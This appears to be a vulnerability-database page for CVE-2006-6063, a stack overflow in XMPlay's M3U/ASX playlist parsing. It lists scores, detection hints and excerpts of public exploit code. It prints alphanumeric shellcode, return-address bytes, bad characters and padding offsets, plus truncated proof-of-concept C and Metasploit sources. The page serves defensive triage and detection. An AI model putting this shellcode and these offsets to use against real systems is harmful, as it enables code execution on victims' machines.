CVE-2006-6063
published 2006-11-22CVE-2006-6063: Stack-based buffer overflow in Un4seen XMPlay 3.3.0.5 and earlier allows remote attackers to execute arbitrary code via a M3U file containing a long (1)…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
58.08%
99.0th percentile
Stack-based buffer overflow in Un4seen XMPlay 3.3.0.5 and earlier allows remote attackers to execute arbitrary code via a M3U file containing a long (1) FileName, and cause a crash via a long (2) DisplayName.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| un4seen | xmplay | <= 3.3.0.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
otherTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtpLEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNipsPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA↗
bytes↗
\xbc\x41\xdb\x77
bytes↗
\xfc\x18\xd7\x77
bytes↗
\xdc\x4a\xd7\x77
bytes↗
\x56\xc2\xe3\x77
bytes↗
\xbc\x41\xdb\x77
bytes↗
\xfc\x18\xd7\x77
bytes↗
\xdc\x4a\xd7\x77
bytes↗
\x56\xc2\xe3\x77
- →Detect oversized FileName field (>498 bytes) in M3U or ASX playlist files parsed by XMPlay; the exploit uses 498 bytes of padding before the return address overwrite. ↗
- →Flag M3U files with an #EXTINF FileName field exceeding ~500 bytes, as this triggers the stack buffer overflow in XMPlay 3.3.0.5 and earlier. ↗
- →Detect ASX playlist files with an overly long filename attribute (href/ref value), as the ASX format is also exploitable via the same boundary error. ↗
- →Payload bad characters for this exploit are: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 — encoded payload will be alphanumeric uppercase; detect long alphanumeric-only strings in playlist filename fields. ↗
- →Using the DisplayName field of M3U for overflow may trigger Windows DEP; FileName field exploitation is the primary attack vector to monitor. ↗
- ·Return addresses are platform-specific; the Metasploit module targets Windows 2000 Pro SP4 and Windows XP Pro SP2 English only. ↗
- ·Payload space is limited to 750 bytes and requires AlphanumUpper encoding, meaning raw shellcode detections will not match without accounting for the encoding. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Un4seen XMPlay 3.3.0.5 stack-based overflow (EDB-2815 / XFDB-30436)
vuldb·2026-04-28·CVSS 7.5
CVE-2006-6063 [HIGH] Un4seen XMPlay 3.3.0.5 stack-based overflow (EDB-2815 / XFDB-30436)
A vulnerability marked as critical has been reported in Un4seen XMPlay 3.3.0.5. Impacted is an unknown function. The manipulation leads to stack-based buffer overflow.
This vulnerability is documented as CVE-2006-6063. The attack can be initiated remotely. Additionally, an exploit exists.
GHSA
GHSA-mpf5-553f-w43r: Stack-based buffer overflow in Un4seen XMPlay 3
ghsa_unreviewed·2022-05-01
CVE-2006-6063 [HIGH] GHSA-mpf5-553f-w43r: Stack-based buffer overflow in Un4seen XMPlay 3
Stack-based buffer overflow in Un4seen XMPlay 3.3.0.5 and earlier allows remote attackers to execute arbitrary code via a M3U file containing a long (1) FileName, and cause a crash via a long (2) DisplayName.
No detection rules found.
Exploit-DB
XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-6063 XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)
XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)
---
##
# $Id: xmplay_asx.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in XMPlay 3.3.0.4.
The vulnerability is caused due to a boundary error within
the parsing of playlists containing an overly long file name.
This module uses the ASX file format.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 9262 $',
'
Exploit-DB
XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow
exploitdb·2006-11-21
CVE-2006-6063 XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow
XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow
---
/*
0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed .ASX files
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
ASX
Reported Exploit Date: 11/21/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHj
Exploit-DB
XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow
exploitdb·2006-11-20
CVE-2006-6063 XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow
XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow
---
/*
0-day XMPlay 3.3.0.4 .M3U Filename Buffer Overflow Exploit
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed M3U files (probably PLS and ASX files as well).
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
Either the DisplayName field of the M3U or the FileName field can be
used to exploit the system, but during my tests, using the DisplayName
field caused Windows DEP to activate. (English Windows XP SP2)
Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
Who I presented the PoC and Discovery to, and he wrote the first PoC
Exploit for it. And Jerome Athias for some neat tools. Both of these
guys are very talented, keep up the good
Metasploit
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
metasploit
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format.
No writeups or analysis indexed.
http://secunia.com/advisories/22999http://www.securityfocus.com/bid/21206http://www.vupen.com/english/advisories/2006/4636https://exchange.xforce.ibmcloud.com/vulnerabilities/30436https://www.exploit-db.com/exploits/2815http://secunia.com/advisories/22999http://www.securityfocus.com/bid/21206http://www.vupen.com/english/advisories/2006/4636https://exchange.xforce.ibmcloud.com/vulnerabilities/30436https://www.exploit-db.com/exploits/2815
2006-11-22
Published